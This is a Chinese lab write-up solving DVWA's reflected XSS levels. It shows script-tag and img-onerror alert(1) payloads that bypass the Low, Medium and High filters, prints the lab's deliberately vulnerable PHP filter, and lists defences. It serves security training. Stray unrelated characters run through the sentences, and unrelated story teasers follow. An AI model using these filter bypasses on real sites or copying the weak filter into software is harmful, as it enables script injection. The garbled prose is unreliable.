DVWA靶場通關(guān)實錄-Reflected Cross Site Scripting (XSS)篇

0x01 簡介

Web客戶端使用Server端腳本生成頁面為用戶提供數(shù)據(jù)時拟淮,如果未經(jīng)驗證的用戶數(shù)據(jù)被包含在頁面中而未經(jīng)HTML實體編碼,客戶端代碼便能夠注入到動態(tài)頁面中斟薇。

0x02 反射型xss-Low

構(gòu)造<script>alert(1);</script>語句即可成功芝加,跟dom型xss攻擊方法一樣,畢竟dom型xss是特殊的反射型xss嘛低飒。

image.png

0x03 反射型xss-Medium

跟dom型一樣,<script也是被過濾了懂盐。重新構(gòu)造攻擊語句進行繞過吧
"></option></select><img src=a onerror="javascript:alert(1);"/>

image.png

0x04 反射型xss-High

high比medium的過濾更加嚴格了褥赊,來試試繞過吧
測試了<>沒有被過濾掉,然后測試得知單引號'和雙引號"也沒有被過濾掉莉恼。
構(gòu)造語句成功繞過"><img src=a onerror="alert(1);">

image.png

看看源代碼:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

0x05 防御方法

  • 對輸入(和URL參數(shù))進行過濾
  • 對輸出進行編碼
  • 白名單和黑名單結(jié)合過濾
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末拌喉,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子俐银,更是在濱河造成了極大的恐慌尿背,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,464評論 6 517
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件捶惜,死亡現(xiàn)場離奇詭異田藐,居然都是意外死亡,警方通過查閱死者的電腦和手機吱七,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,033評論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門汽久,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人踊餐,你說我怎么就攤上這事回窘。” “怎么了市袖?”我有些...
    開封第一講書人閱讀 169,078評論 0 362
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵啡直,是天一觀的道長。 經(jīng)常有香客問我苍碟,道長酒觅,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 59,979評論 1 299
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任微峰,我火速辦了婚禮舷丹,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘蜓肆。我一直安慰自己颜凯,他們只是感情好,可當我...
    茶點故事閱讀 69,001評論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布仗扬。 她就那樣靜靜地躺著症概,像睡著了一般。 火紅的嫁衣襯著肌膚如雪早芭。 梳的紋絲不亂的頭發(fā)上彼城,一...
    開封第一講書人閱讀 52,584評論 1 312
  • 城市分裂傳說
    那天,我揣著相機與錄音,去河邊找鬼募壕。 笑死调炬,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的舱馅。 我是一名探鬼主播缰泡,決...
    沈念sama閱讀 41,085評論 3 422
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼代嗤!你這毒婦竟也來了匀谣?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 40,023評論 0 277
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤资溃,失蹤者是張志新(化名)和其女友劉穎武翎,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體溶锭,經(jīng)...
    沈念sama閱讀 46,555評論 1 319
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡宝恶,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,626評論 3 342
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了趴捅。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片垫毙。...
    茶點故事閱讀 40,769評論 1 353
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖拱绑,靈堂內(nèi)的尸體忽然破棺而出综芥,到底是詐尸還是另有隱情,我是刑警寧澤猎拨,帶...
    沈念sama閱讀 36,439評論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布膀藐,位于F島的核電站,受9級特大地震影響红省,放射性物質(zhì)發(fā)生泄漏额各。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 42,115評論 3 335
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一吧恃、第九天 我趴在偏房一處隱蔽的房頂上張望虾啦。 院中可真熱鬧,春花似錦痕寓、人聲如沸傲醉。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,601評論 0 25
  • 一樁弒父案呻率,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽硬毕。三九已至,卻和暖如春筷凤,著一層夾襖步出監(jiān)牢的瞬間昭殉,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,702評論 1 274
  • 情欲美人皮
    我被黑心中介騙來泰國打工藐守, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留挪丢,地道東北人。 一個月前我還...
    沈念sama閱讀 49,191評論 3 378
  • 代替公主和親
    正文 我出身青樓卢厂,卻偏偏與公主長得像乾蓬,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子慎恒,可洞房花燭夜當晚...
    茶點故事閱讀 45,781評論 2 361

推薦閱讀更多精彩內(nèi)容